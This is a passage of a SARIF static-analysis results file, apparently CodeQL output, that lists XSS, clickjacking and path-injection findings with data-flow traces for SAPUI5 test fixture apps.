"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "oEvent. ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 60 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 19, - "startColumn" : 44, - "endColumn" : 55 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 34, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output3: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output3}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1406455ac263a2d9:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 12, - "startColumn" : 26, - "endColumn" : 46 - } - }, - "message" : { - "text" : "new JSONModel(oData)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 48 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 29 - } - }, - "message" : { - "text" : "output: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - }, - "region" : { - "startLine" : 8, - "startColumn" : 40, - "endColumn" : 63 - } - }, - "message" : { - "text" : "\"contro ... l.json\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5edd24be658b61a4:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "data-value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - }, - "message" : { - "text" : "data-content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6e0d8f690e30e24a:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 9, - "startColumn" : 9, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6152b8f74a1abdf5:1", - "primaryLocationStartColumnFingerprint" : "0" - } - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 28, - "startColumn" : 34, - "endColumn" : 66 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b01bd23ca3666824:1", - "primaryLocationStartColumnFingerprint" : "25" - } - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7fe81114896a63c:1", - "primaryLocationStartColumnFingerprint" : "0" - } - }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "df700c15dad274b2:1", - "primaryLocationStartColumnFingerprint" : "0" - } - }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "68e5ff83e2198ff5:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b79de9dff4d8f842:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "de27f6d546a116e8:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 